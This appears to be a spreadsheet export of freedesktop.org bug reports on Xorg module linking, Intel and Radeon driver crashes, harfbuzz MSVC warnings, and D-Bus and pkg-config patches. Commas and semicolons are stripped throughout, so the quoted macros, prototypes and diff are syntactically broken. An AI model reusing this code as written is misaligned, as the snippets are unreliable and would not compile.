glamor_name_from_pixmap drmModeFreePropertyBlob FakeClientID glamor_init drmModeFreeProperty CreateNewResourceType xf86CrtcScreenInit xf86LoadSubModule drmGetDeviceNameFromFd gbm_bo_destroy xf86_cursors_init DRI2ScreenInit xf86AddEntityToScreen drmModeMoveCursor xf86CrtcConfigInit xf86DPMSInit xf86CrtcSetScreenSubpixelOrder xf86SetSilkenMouse glamor_supports_pixmap_import_export xf86InitialConfiguration xf86GetEntityPrivate xf86OutputSetEDID fbPictureInit miGetDefaultVisualMask xf86CrtcRotate NameForAtom xf86AllocateScreen xf86FindOptionValue gbm_bo_get_handle RemoveGeneralSocket drmModeSetCursor dixRegisterScreenSpecificPrivateKey drmModeGetPropertyBlob xf86SetPrimInitDone xf86ValidateModesSize AddResource xf86OutputDestroy xf86ScreenToScrn xf86AddGeneralHandler miCreateDefColormap drmModeDirtyFB miDCInitialize XNFcalloc DRI2BlockClient gbm_bo_get_stride xf86ShowUnusedOptions xf86SetDepthBpp miSetVisualTypes xf86CollectOptions MakeAtom FatalError xf86ModeHeight xf86DrvMsg shadowUpdatePacked drmModeGetProperty drmModeAddFB xf86ModeVRefresh xf86PrintChipsets glamor_egl_init drmModeFreeResources xf86SetModeCrtc xf86_hide_cursors DamageDestroy xf86ConfigFbEntity miSetPixmapDepths drmSetMaster drmModeFreeConnector xf86OutputCreate shadowAdd DRI2WaitMSCComplete RRConfigureOutputProperty XNFalloc xf86GetPointerScreenFuncs DRI2CloseScreen xf86ReturnOptValBool xf86LoaderCheckSymbol DamageEmpty drmClose xf86HandleColormaps AddGeneralSocket xf86SetWeight drmHandleEvent drmGetCap miClearVisualTypes drmModeSetCursor2 drmModeConnectorSetProperty RRGetInfo xf86InterpretEDID pixman_region_copy drmModeCrtcSetGamma xf86DrvMsgVerb glamor_block_handler present_event_notify DamageRegister drmPrimeFDToHandle drmOpen xf86ProviderSetup RemoveBlockAndWakeupHandlers DamageUnregister drmModeGetCrtc xf86IsPrimInitDone xf86AddDriver xf86ProcessOptions xf86ConfigPciEntity xf86GetOptValString drmIoctl gbm_bo_create drmModeGetEncoder xf86SetBackingStore xf86CrtcSetSizeRange ErrorF DamageCreate
Warning: undefined symbols in /usr/lib64/xorg/modules/libglamoregl.so: serverClient lastGLContext screenInfo serverGeneration RegionEmptyData PictureScreenPrivateKeyRec PixmapWidthPaddingInfo RegionEmptyBox miChangeGC miCopyGC miChangeClip miDestroyClip miCopyClip miPolyRectangle miPolyArc miFillPolygon miPolyFillArc miImageGlyphBlt RegionAppend AllocateFontPrivateIndex miDoCopy miPolyGlyphBlt miImageGlyphBlt RegionDestroy fbComposite LogMessageVerb fbGetImage pixman_rasterize_trapezoid ValidatePicture xf86Msg fbGetSpans miPolyPoint fbAddTraps miSyncShmScreenInit ValidateGC miImageText8 fbDestroyPixmap miPolyText16 fbCopy1toN miSyncGetScreenFuncs dixRegisterPrivateKey fbGetScreenPrivateKey XNFasprintf RegionCreate miCompositeRects GetScratchGC FreeScratchGC fbValidateGC pixman_region_rectangles pixman_region_contains_rectangle CreatePicture miCreatePicture miImageText16 miDestroyPicture pixman_image_unref ChangeGC pixman_region_init_rects fb24_32ReformatTile pixman_region_extents miPushPixels fbCopyNtoN xf86AllocateScrnInfoPrivateIndex PictureMatchFormat fbCreatePixmap fbCreateGC pixman_region_union fbTriangles pixman_region_init_with_extents miHandleExposures fbPolySegment xf86ScreenToScrn pixman_region_contains_point fbSetSpans RegionValidate miPolyText8 MakeAtom FatalError xf86DrvMsg DamageDestroy dri3_screen_init fbPadPixmap pixman_region_intersect _FontSetNewPrivate pixman_image_create_bits XNFalloc pixman_f_transform_point DamageDamageRegion DamageRegionAppend miComputeCompositeRegion fbPolyFillRect LogMessage CompositePicture pixman_transform_is_int_translate pixman_f_transform_from_pixman_transform miRenderColorToPixel XNFstrdup pixman_region_copy pixman_image_get_data DamageRegionProcessPending pixman_image_composite DamageRegister FreePicture miCopyRegion CreateSolidPicture fbCopyNto1 pixman_region_subtract pixman_region_translate XNFvasprintf DamageUnregister pixman_region_init miPolySegment miPolylines fbFillSpans dixGetGlyphs pixman_region_fini fbPixmapToRegion fbPutImage miTrapezoidBounds miDestroyGC ErrorF DamageCreate
Warning: undefined symbols in /usr/lib64/xorg/modules/libshadow.so: RegisterBlockAndWakeupHandlers dixRegisterPrivateKey fbGetScreenPrivateKey DamageRegion DamageDestroy DamageEmpty DamageRegister RemoveBlockAndWakeupHandlers DamageUnregister DamageSetup DamageCreate
*********************
Inspecting the binaries after the build shows that the symbols causing the load failure are provided by $(srcdir)/fb/libfb.{a|la} so it sounds like the building process is actually underlinking both libglamoregl.so and libshadow.so...
BTW the same inspection work shows that:
1) libshadow.so also needs references from $(srcdir)/miext/damage/libdamage.{a|la} and $(srcdir)/dix/libdix.{a|la} to avoid to have undefined symbols.
2) libglamoregl.so also needs references from $(srcdir)/render/librender.{a|la}
$(srcdir)/miext/damage/libdamage.{a|la} $(srcdir)/dix/libdix.{a|la} $(srcdir)/os/libos.{a|la} $(srcdir)/dri3/libdri3.{a|la} $(srcdir)/hw/xfree86/common/libcommon.{a|la} and some more...
I first tried to manually add the needed reference to libfb to the Makefiles for libglamoregl and libshadow (see patch below) but given my little knowledge about autotools and about the xserver sources tree I don't think is correct: indeed using it removed the undefined warnings for fbXXXX symbols but added many more warnings than befoire for miXXXX ones...
What is wrong here? Our build system or there is really some problem in the sources re: linking xorg modules?</t>
  </si>
  <si>
    <t>mc2374</t>
  </si>
  <si>
    <t>DRI-34543</t>
  </si>
  <si>
    <t>BROADCAST_RGB fails</t>
  </si>
  <si>
    <t>Trying to set the BROADCAST_RGB option fails either in Xorg.conf or with xrandr:
Xorg:
[699959.322] (WW) intel(0): Option BROADCAST_RGB is not used
xrandr:
xrandr --output HDMI2 --set BROADCAST_RGB 0
X Error of failed request:  BadName (named color or font does not exist)
  Major opcode of failed request:  150 (RANDR)
  Minor opcode of failed request:  11 (RRQueryOutputProperty)
  Serial number of failed request:  33
  Current serial number in output stream:  33
I took a look at the source code for the Xorg driver and couldn't find the option in the code only the man page.
So the result is that it is not possible to specify limited rgb.
System info:
libdrm: 2.4.23
kernel: 2.6.36-999-generic #201010311115
CPU/GFX: core i3 540
i915 driver: 2.14.0</t>
  </si>
  <si>
    <t>HARFBUZZ-84491</t>
  </si>
  <si>
    <t>MSVC warning C4244 on hb_be_xxx_put macros in hb-private.hh</t>
  </si>
  <si>
    <t>When building harfbuzz with MSVC with level 4 warnings enabled use of the hb_be_xxx_put macros in hb-private.hh can trigger warning C4244.
Here are the macro definitions on trunk (incidentally why are these ordered 16 32 24?):
#define hb_be_uint16_put(vV)	HB_STMT_START { v[0] = (V&gt;&gt;8) v[1] = (V) } HB_STMT_END
#define hb_be_uint32_put(vV)	HB_STMT_START { v[0] = (V&gt;&gt;24) v[1] = (V&gt;&gt;16) v[2] = (V&gt;&gt;8) v[3] = (V) } HB_STMT_END
#define hb_be_uint24_put(vV)	HB_STMT_START { v[0] = (V&gt;&gt;16) v[1] = (V&gt;&gt;8) v[2] = (V) } HB_STMT_END
The warnings can be fixed by either using &amp; 0xffs or static_cast()s to instruct the compiler that truncation of &gt;8-bit values to 8 bits is intentional e.g.:
#define hb_be_uint16_put(vV)	HB_STMT_START { v[0] = (V&gt;&gt;8) v[1] = static_cast(V) } HB_STMT_END
#define hb_be_uint32_put(vV)	HB_STMT_START { v[0] = (V&gt;&gt;24) v[1] = static_cast(V&gt;&gt;16) v[2] = static_cast(V&gt;&gt;8) v[3] = static_cast(V) } HB_STMT_END
#define hb_be_uint24_put(vV)	HB_STMT_START { v[0] = static_cast(V&gt;&gt;16) v[1] = static_cast(V&gt;&gt;8) v[2] = static_cast(V) } HB_STMT_END
(Note that if callers might pass larger types to the first two macros than uint16_t and uint32_t respectively it's necessary to add static_cast()s on the v[0] assignments as well.)</t>
  </si>
  <si>
    <t>pkasting</t>
  </si>
  <si>
    <t>XORG-11888</t>
  </si>
  <si>
    <t>Bad EXA performance on radeon X700 PCIE</t>
  </si>
  <si>
    <t>Not sure if this is a bug but EXA is unworkably slow on my system most notably in mozilla with switching tabs it takes seconds to render the page and ui elements. XAA doesn't have these issues. It happens in the release versions too.
hardware: 
RV410       Radeon X700 M26 PCIE
settings:
Section Device
        Identifier ATI X700
        Driver radeon
        BusID  PCI:2:0:0
        Option AccelMethod EXA
        Option AccelDFS    1  # 0 has no effect
EndSection</t>
  </si>
  <si>
    <t>LIBREOFFICE-74507</t>
  </si>
  <si>
    <t>Calc 4.2.0.4 Crashes displaying specific xls-file (4.1.4.2 can open it without problem)</t>
  </si>
  <si>
    <t>Created attachment 93362
.xls-file to reproduce the crash
When started from the console the following errors appears:
soffice.bin: Fatal IO error: client killed
KCrash: Application 'soffice.bin' crashing...
KCrash cannot reach kdeinit launching directly.
Maybe Related to bug 39032?
xls file with 4 data points and chart (non-contiguous data range)</t>
  </si>
  <si>
    <t>lars.luennemann</t>
  </si>
  <si>
    <t>XORG-21282</t>
  </si>
  <si>
    <t>&gt;= xf86-video-intel-2.6.2: Xv crashes X server on i965</t>
  </si>
  <si>
    <t>Created attachment 24943
Xorg.log with intel 2.6.3 with patch 2026c57cf0a352d9e6f9d208cfb7d4d550614477
After updating to xf86-video-intel-2.6.3 my laptop would no longer play DVD in xine or any dvd playback. When the attempt was made to play any DVD it would immediately go back to the gdm screen.
This patch is applied on the intel driver on gentoo by default :
commit 2026c57cf0a352d9e6f9d208cfb7d4d550614477
Author: Kalev Lember 
Date:   Fri Mar 13 21:32:08 2009 +0200
    Fix Xv crash with overlay video.
This bug is different of Bug #20525 then.
I've bisect the failed patch.
# git bisect start
# git bisect good xf86-video-intel-2.6.1
# git bisect bad 2.6.3
I find this commit :
8ef4eb50193a849cb9fd0d7a85c6814e1d473101 is first bad commit
commit 8ef4eb50193a849cb9fd0d7a85c6814e1d473101
Author: Eric Anholt 
Date:   Mon Jan 19 14:43:20 2009 -0800
    Do check_aperture_space and batch_start_atomic for i965 video.
Here is the lspci of the afflicted system:
# lspci 
00:00.0 Host bridge: Intel Corporation Mobile PM965/GM965/GL960 Memory Controller Hub (rev 0c)
00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c)
00:02.1 Display controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c)
00:19.0 Ethernet controller: Intel Corporation 82566MM Gigabit Network Connection (rev 03)
00:1a.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #4 (rev 03)
00:1a.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #5 (rev 03)
00:1a.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #2 (rev 03)
00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 03)
00:1c.0 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 1 (rev 03)
00:1c.1 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 2 (rev 03)
00:1d.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #1 (rev 03)
00:1d.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #2 (rev 03)
00:1d.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #1 (rev 03)
00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev f3)
00:1f.0 ISA bridge: Intel Corporation 82801HBM (ICH8M-E) LPC Interface Controller (rev 03)
00:1f.1 IDE interface: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) IDE Controller (rev 03)
00:1f.2 SATA controller: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) SATA AHCI Controller (rev 03)
00:1f.3 SMBus: Intel Corporation 82801H (ICH8 Family) SMBus Controller (rev 03)
03:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)
05:00.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev ba)
05:00.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller (rev 04)
05:00.2 SD Host controller: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 21)
My Xorg.0.log in attachment.
Will give any other needed information.</t>
  </si>
  <si>
    <t>anthoine.bourgeois</t>
  </si>
  <si>
    <t>TELEPATHY-27772</t>
  </si>
  <si>
    <t>de-obfuscate self-&gt;priv access</t>
  </si>
  <si>
    <t>The logger's GET_PRIV macros are neither obvious nor type-safe. self-&gt;priv (as used in telepathy-glib) is (usually) less typing and considerably safer.
See the branch:
http://git.collabora.co.uk/?p=user/smcv/telepathy-logger.gita=shortlogh=refs/heads/get-priv-easier</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-46307</t>
  </si>
  <si>
    <t>Add the repo access for fontconfig</t>
  </si>
  <si>
    <t>I officially have taken over the maintainership of fontconfig recently [*1]. I need to setup an writable access to the git repo on fdo. please help me for that. my account on fdo is tagoh.
*1 http://lists.freedesktop.org/archives/fontconfig/2012-February/003748.html</t>
  </si>
  <si>
    <t>DRI-101219</t>
  </si>
  <si>
    <t>GPU HANG</t>
  </si>
  <si>
    <t>Created attachment 131548
/sys/class/drm/card0/error</t>
  </si>
  <si>
    <t>vlad.gheorghe</t>
  </si>
  <si>
    <t>XORG-26640</t>
  </si>
  <si>
    <t>mouse jumps to left upper corner after certain keys were pressed</t>
  </si>
  <si>
    <t>hi
how to reproduce:
1) press an alphanumeric key
2) press a multimedia key (in my case any of the keys that control the volume)
3) move the mouse
result: mouse cursor jumps immediately to the left upper corner of the screen
i have an external lenovo usb keyboard with trackpoint. xinput output:
Lite-On Technology Corp. ThinkPad USB Keyboard with TrackPoint    id=7    [slave  keyboard (3)]
this bug doesn't occur with my internal keyboard which has a trackpoint and multimedia keys as well.
other people with usb keyboard mouse combos observed this behavior too:
http://bbs.archlinux.org/viewtopic.php?id=86344
https://bugs.launchpad.net/ubuntu/+source/rhythmbox/+bug/513852</t>
  </si>
  <si>
    <t>cllccl</t>
  </si>
  <si>
    <t>PKG-CONFIG-31700</t>
  </si>
  <si>
    <t>On-board popt.h prototype mismatch vs current standalone lib</t>
  </si>
  <si>
    <t>Building pkgconfig-0.25 on OS X 10.6 using --with-installed-popt with popt-1.14 (long-existing version build from debian's source tarball supplied via fink):
gcc -DHAVE_CONFIG_H -I. -DPKG_CONFIG_PC_PATH=\/sw/lib/pkgconfig:/sw/share/pkgconfig:/usr/X11/lib/pkgconfig:/usr/X11R6/lib/pkgconfig:/usr/lib/pkgconfig\ -I./glib-1.2.10 -I./glib-1.2.10   -I/sw/include  -Os -MT parse.o -MD -MP -MF .deps/parse.Tpo -c -o parse.o parse.c
parse.c: In function 'parse_libs':
parse.c:759: warning: passing argument 3 of 'poptParseArgvString' from incompatible pointer type
parse.c: In function 'parse_libs_private':
parse.c:808: warning: passing argument 3 of 'poptParseArgvString' from incompatible pointer type
parse.c: In function 'parse_cflags':
parse.c:849: warning: passing argument 3 of 'poptParseArgvString' from incompatible pointer type
Same with popt-1.16 (recently-released from debian). If I do not use --with-installed-popt those parse.c warnings disappear. The prototype in popt.h is slightly different in popt-1.16 (and comparable in 1.14):
int poptParseArgvString(
  const char * s
  int * argcPtr
  const char *** argvPtr
)
vs one included with pkg-config:
int poptParseArgvString(
  char * s
  int * argcPtr
  char *** argvPtr
)
and parse.c is coded to match the included one (not 'const').</t>
  </si>
  <si>
    <t>LIBREOFFICE-70858</t>
  </si>
  <si>
    <t>LibreLogo: font settings in procedures stop Logo programs under Windows</t>
  </si>
  <si>
    <t>Test example (on Windows XP Windows 7 the following code doesn't work):
TO test
FONTSIZE 10
FONTSIZE 100
LABEL 'Hello World!'
END
test</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-34550</t>
  </si>
  <si>
    <t>Created attachment 43629
SSH public key
Hi
I'd be happy to host on fd.o my branches/patches coming from X.Orgâ€™s packaging for Debian.
Real name              : Cyril Brulebois
Mail address           : kibi@debian.org
Preferred account name : kibi
Thanks for considering.
KiBi.</t>
  </si>
  <si>
    <t>DBUS-7666</t>
  </si>
  <si>
    <t>Windows patch: DBUS_VERBOSE</t>
  </si>
  <si>
    <t>Index: dbus/dbus-internals.c
===================================================================
--- dbus/dbus-internals.c	(revision 45)
+++ dbus/dbus-internals.c	(working copy)
@@ -287 +286 @@
 #include 
 #include 
 #include 
-#include 
 #include 
 #include 
@@ -2467 +2458 @@
   if (!verbose_initted)
     {
-      verbose = _dbus_getenv (DBUS_VERBOSE) != NULL
+      const char *p = _dbus_getenv (DBUS_VERBOSE) 
+      verbose = p != NULL 
       verbose_initted = TRUE
       if (!verbose)
         return
relating notes:
&gt; +#ifndef DBUS_WIN
&gt;  #include 
&gt; +#endif
(havoc) If unistd is not used in the file this should just be deleted if it
is then there's more thinking to do (depends on how it's used).
&gt; +#ifdef DBUS_WIN
&gt; +      const char *p = _dbus_getenv (DBUS_VERBOSE) +      verbose = p !=
NULL 
&gt; +#else
&gt;        verbose = _dbus_getenv (DBUS_VERBOSE) != NULL
&gt; +#endif
(havoc) Why not just add the *p == 1 to unix also and drop the #ifdef
changelog entry: 
	* dbus/dbus-internals.c: unistd.h is not used 
	(_dbus_verbose_real): only enable verbose printing 
	if DBUS_VERBOSE environment var is set to '1'</t>
  </si>
  <si>
    <t>XORG-22714</t>
  </si>
  <si>
    <t>[855GM] Soft lockup using KMS with xserver-xorg-core (2:1.6.1.901-3) + xserver-xorg-video-intel (2:2.7.99.901-3)</t>
  </si>
  <si>
    <t>Hello
A test to use KMS with a recent X.org fails with a soft lockup. Problem is 100% reproducible.
Below some more details. BR Oliver
---
- xserver-xorg-core (2:1.6.1.901-3) 
- xserver-xorg-video-intel (2:2.7.99.901-3)
- Debian kernel: linux-image-2.6.30-1-686 (2.6.30-2)
- Machine: DELL Inspiron 500m
- Chip: Intel Corporation 82852/855GM
Packages:
---
xserver-common (2:1.6.1.901-3) ...
libaudit0 (1.7.11-1) ...
libpciaccess0 (0.10.6-1) ...
console-setup-mini (1.36) ...
libgl1-mesa-glx (7.5~rc4-1) ...
libgl1-mesa-dri (7.5~rc4-1) ...
xserver-xorg-core (2:1.6.1.901-3) ...
xserver-xorg-input-wacom (0.8.3.2-1) ...
xserver-xorg-input-evdev (1:2.2.2-1) ...
xserver-xorg-video-dummy (1:0.3.1-2) ...
xserver-xorg-input-synaptics (1.1.2-1) ...
xserver-xorg-input-mouse (1:1.4.0-2) ...
xserver-xorg-input-kbd (1:1.3.2-3) ...
xserver-xorg (1:7.4+3)
libdrm-intel1 (2.4.11+git+20090630+de1ed01-1) ...
xserver-xorg-video-intel (2:2.7.99.901-3) ...
---
lspci -v:
---
[...]
00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) (prog-if 00 [VGA controller])
        Subsystem: Dell Device 0153                                                                                               
        Flags: bus master fast devsel latency 0 IRQ 11                                                                         
        Memory at f0000000 (32-bit prefetchable) [size=128M]                                                                     
        Memory at faf80000 (32-bit non-prefetchable) [size=512K]                                                                 
        I/O ports at c000 [size=8]                                                                                                
        Expansion ROM at  [disabled]                                                                                  
        Capabilities: [d0] Power Management version 1                                                                             
00:02.1 Display controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02)
        Subsystem: Dell Device 0153                                                          
        Flags: bus master fast devsel latency 0                                            
        Memory at e8000000 (32-bit prefetchable) [size=128M]                                
        Memory at faf00000 (32-bit non-prefetchable) [size=512K]                            
        Capabilities: [d0] Power Management version 1                                        
[...]
---
kmsg:
---
[...]
[  577.744425] [drm] Initialized drm 1.1.0 20060810
[  581.516208] i915 0000:00:02.0: PCI INT A -&gt; Link[LNKA] -&gt; GSI 11 (level low) -&gt; IRQ 11
[  582.586672] allocated 1024x768 fb: 0x000ff000 bo f6001bc0
[  582.593505] Console: switching to colour frame buffer device 128x48
[  582.678759] [drm] LVDS-8: set mode 1024x768 f
[  582.749827] fb0: inteldrmfb frame buffer device
[  582.754369] registered panic notifier
[  582.758053] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0
[  770.948011] BUG: soft lockup - CPU#0 stuck for 61s! [Xorg:4700]
[  770.948011] Modules linked in: i915 i2c_algo_bit drm i2c_core michael_mic arc4 ecb lib80211_crypt_tkip binfmt_misc ppdev lp bnep rfcomm l2cap bluetooth acpi_cpufreq cpufreq_powersave cpufreq_userspace cpufreq_stats cpufreq_conservative nfsd exportfs nfs lockd fscache nfs_acl auth_rpcgss sunrpc ext4 jbd2 crc16 fuse dm_crypt dm_snapshot cdc_ether usbnet loop pcmcia ipw2100 joydev libipw lib80211 yenta_socket rsrc_nonstatic pcmcia_core snd_intel8x0 snd_seq_midi snd_intel8x0m snd_ac97_codec ac97_bus snd_rawmidi snd_seq_midi_event snd_pcm_oss snd_mixer_oss snd_seq snd_seq_device snd_pcm psmouse usbhid shpchp snd_timersnd irda soundcore parport_pc rng_core hid dcdbas crc_ccitt serio_raw pcspkr snd_page_alloc pci_hotplug evdev parport battery button ac processor ext3 jbd mbcache ide_cd_mod ide_gd_mod cdrom ata_generic libata uhci_hcd scsi_mod ide_pci_generic ehci_hcd piix intel_agp e100 mii usbcore ide_core video output agpgart thermal fan thermal_sys dm_mirror dm_region_hash dm_log dm_mod
[  770.948011]
[  770.948011] Pid: 4700 comm: Xorg Not tainted (2.6.30-1-686 #1) Inspiron 500m
[  770.948011] EIP: 0060:[] EFLAGS: 00003286 CPU: 0
[  770.948011] EIP is at intel_crt_load_detect+0x250/0x2bc [i915]
[  770.948011] EAX: f94f0000 EBX: 000000ac ECX: 000001e8 EDX: 000001e4
[  770.948011] ESI: f643b000 EDI: 000001e0 EBP: 00000000 ESP: f6129da0
[  770.948011]  DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068
[  770.948011] CR0: 8005003b CR2: b801222c CR3: 360ea000 CR4: 000006d0
[  770.948011] DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000
[  770.948011] DR6: ffff0ff0 DR7: 00000400
[  770.948011] Call Trace:
[  770.948011]  [] ? intel_crt_detect+0x212/0x22f [i915]
[  770.948011]  [] ? drm_helper_probe_single_connector_modes+0x69/0x1e6 [drm]
[  770.948011]  [] ? drm_mode_object_find+0x3e/0x45 [drm]
[  770.948011]  [] ? drm_mode_getconnector+0xbb/0x289 [drm]
[  770.948011]  [] ? io_schedule+0x6b/0x87
[  770.948011]  [] ? drm_ioctl+0x1ca/0x24b [drm]
[  770.948011]  [] ? drm_mode_getconnector+0x0/0x289 [drm]
[  770.948011]  [] ? vfs_ioctl+0x49/0x5f
[  770.948011]  [] ? do_vfs_ioctl+0x444/0x47f
[  770.948011]  [] ? _atomic_dec_and_lock+0x26/0x40
[  770.948011]  [] ? sys_ioctl+0x41/0x58
[  770.948011]  [] ? sysenter_do_call+0x12/0x28
[  836.448011] BUG: soft lockup - CPU#0 stuck for 61s! [Xorg:4700]
[...]
---</t>
  </si>
  <si>
    <t>oliverml1</t>
  </si>
  <si>
    <t>DRI-68708</t>
  </si>
  <si>
    <t>Intel+Radeon Hybrid laptop hang on boot while being on the battery</t>
  </si>
  <si>
    <t>Created attachment 84847
messages | grep radeon
I have a hybrid muxless laptop with intel+radeon:
#lspci | grep VGA
00:02.0 VGA compatible controller: Intel Corporation 3rd Gen Core processor Graphics Controller (rev 09)
01:00.0 VGA compatible controller: Advanced Micro Devices [AMD] nee ATI Cape Verde [Radeon HD 7700M Series]
I use openSUSE 12.3 x86_64 with
kernel              3.11-rc7
Xorg-x11-server     1.14.2
Mesa                git20130827
libdrm2             git20130722
libdrm-radeon       git20130722
xf86-video-ati      git20130827
The laptop hangs on boot while being on the battery.
When I plug it to the charger and try to boot it boots fines.
The attached file is from messages: two hangs when I tried to boot on the battery and successful boot with power supply.</t>
  </si>
  <si>
    <t>DRI-83866</t>
  </si>
  <si>
    <t>[BYT] DP monitor fail to be lighted up on every interlaced scanning resolution</t>
  </si>
  <si>
    <t>Created attachment 106294
dmesg
==System Environment==
--------------------------
I fail to find a good commit. 
Non-working platforms: Baytrail
==kernel==
--------------------------
-nightly: 43df30da20447e2856b2761215ff274886a9f931 (fails)
    drm-intel-nightly: 2014y-09m-12d-15h-35m-20s UTC integration manifest
-queued: 648fb42d1e77cf90cddea2b1cf1f4ac4453e65e6 (fails)
    drm/i915: Extend BIOS stolen mem handling to all platform
-fixes: e76c8c5979021483a3a6b480cfe360c644a403c0 (fails)
    drm/i915: Fix SRC_COPY width on 830/845g
==Bug detailed description==
-----------------------------
Monitor Manufacturer: ASUS
Monitor mode veision : PA238Q
DP monitor fail to be lighted up on every interlaced scanning resolution.
Resolution details:
1920x1080i 60 1920 2008 2052 2200 1080 1084 1094 1125 0x15 0x40 74250
1920x1080i 60 1920 2008 2052 2200 1080 1084 1094 1125 0x15 0x40 74176
1920x1080i 50 1920 2448 2492 2640 1080 1084 1094 1125 0x15 0x40 74250
==Reproduce steps==
---------------------------- 
1. ./testdisplay -a
2. check interlaced scanning resolution</t>
  </si>
  <si>
    <t>DRI-105018</t>
  </si>
  <si>
    <t>Kernel panic when waking up after screen goes blank.</t>
  </si>
  <si>
    <t>I'm currently running on latest Manjaro XFCE with the 4.15 kernel just released and I found that the system would crash when trying to wake up after the screen went blank.
The system is an AMD Laptop (ASUS ROG STRIX GL702ZC) and the problem is 100% reproducible with the following steps:
- Lock the screen leave the screen blank for at least 3-5 minutes.
- Try wake the screen up like moving the mouse cursor.
At first I did not find the cause but after looking into the journalctl I was able to find something that appears to be a kernel panic. It existed since the beginning with the 4.14 kernel and remained unsolved even after upgrading to 4.15 kernel.
Feb 07 11:48:59 linuxsys kernel: BUG: unable to handle kernel NULL pointer dereference at           (null)
Feb 07 11:48:59 linuxsys kernel: IP: dce110_vblank_set+0x4f/0xb0 [amdgpu]
Feb 07 11:48:59 linuxsys kernel: PGD 7e2ac2067 P4D 7e2ac2067 PUD 7e2a7e067 PMD 0 
Feb 07 11:48:59 linuxsys kernel: Oops: 0000 [#1] PREEMPT SMP NOPTI
Feb 07 11:48:59 linuxsys kernel: Modules linked in: vmw_vsock_vmci_transport vsock rfcomm fuse bnep vmnet(O) arc4 amdkfd nls_iso8859_1 amd_iommu_v2 nls_cp437 vfat fat amdgpu iwlmvm uvcvideo mac80211 videobuf2_vmalloc edac_mce_amd btusb vide
Feb 07 11:48:59 linuxsys kernel:  rng_core cryptd pcspkr k10temp i2c_piix4 shpchp battery wmi thermal ac tpm_crb tpm_tis tpm_tis_core video tpm asus_wireless i2c_hid button acpi_cpufreq sch_fq_codel vmmon(O) vmw_vmci vboxnetflt(O) vboxnetad
Feb 07 11:48:59 linuxsys kernel: CPU: 15 PID: 1467 Comm: xfwm4 Tainted: G        W  O     4.15.0-1-MANJARO #1
Feb 07 11:48:59 linuxsys kernel: Hardware name: ASUSTeK COMPUTER INC. GL702ZC/GL702ZC BIOS GL702ZC.303 12/15/2017
Feb 07 11:48:59 linuxsys kernel: RIP: 0010:dce110_vblank_set+0x4f/0xb0 [amdgpu]
Feb 07 11:48:59 linuxsys kernel: RSP: 0018:ffffb4e388c7bbe0 EFLAGS: 00010002
Feb 07 11:48:59 linuxsys kernel: RAX: ffff9b458850c000 RBX: 0000000000000001 RCX: 0000000000000000
Feb 07 11:48:59 linuxsys kernel: RDX: 0000000000000000 RSI: 000000000000000c RDI: 0000000000000000
Feb 07 11:48:59 linuxsys kernel: RBP: ffff9b4b2f4168e0 R08: 0000000000000000 R09: 0000000000000000
Feb 07 11:48:59 linuxsys kernel: R10: 00007fff89afe9f0 R11: ffff9b4b2b86ac40 R12: ffff9b4b38511a80
Feb 07 11:48:59 linuxsys kernel: R13: ffffffffc12bbba0 R14: ffff9b4b281f0000 R15: ffff9b4b3ab4cb68
Feb 07 11:48:59 linuxsys kernel: FS:  00007f0bdae66980(0000) GS:ffff9b4b3e9c0000(0000) knlGS:0000000000000000
Feb 07 11:48:59 linuxsys kernel: CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Feb 07 11:48:59 linuxsys kernel: CR2: 0000000000000000 CR3: 00000007d96c8000 CR4: 00000000003406e0
Feb 07 11:48:59 linuxsys kernel: Call Trace:
Feb 07 11:48:59 linuxsys kernel:  amdgpu_dm_set_crtc_irq_state+0x31/0x60 [amdgpu]
Feb 07 11:48:59 linuxsys kernel:  amdgpu_irq_update+0x55/0x90 [amdgpu]
Feb 07 11:48:59 linuxsys kernel:  drm_vblank_enable+0x84/0x100 [drm]
Feb 07 11:48:59 linuxsys kernel:  drm_vblank_get+0x8d/0xb0 [drm]
Feb 07 11:48:59 linuxsys kernel:  drm_wait_vblank_ioctl+0x12a/0x690 [drm]
Feb 07 11:48:59 linuxsys kernel:  ? unix_stream_recvmsg+0x53/0x70
Feb 07 11:48:59 linuxsys kernel:  ? drm_legacy_modeset_ctl_ioctl+0x100/0x100 [drm]
Feb 07 11:48:59 linuxsys kernel:  drm_ioctl_kernel+0x5b/0xb0 [drm]
Feb 07 11:48:59 linuxsys kernel:  drm_ioctl+0x2d5/0x370 [drm]
Feb 07 11:48:59 linuxsys kernel:  ? drm_legacy_modeset_ctl_ioctl+0x100/0x100 [drm]
Feb 07 11:48:59 linuxsys kernel:  ? do_iter_write+0xdc/0x190
Feb 07 11:48:59 linuxsys kernel:  ? vfs_writev+0xb9/0x110
Feb 07 11:48:59 linuxsys kernel:  amdgpu_drm_ioctl+0x49/0x80 [amdgpu]
Feb 07 11:48:59 linuxsys kernel:  do_vfs_ioctl+0xa4/0x630
Feb 07 11:48:59 linuxsys kernel:  ? __sys_recvmsg+0x4e/0x90
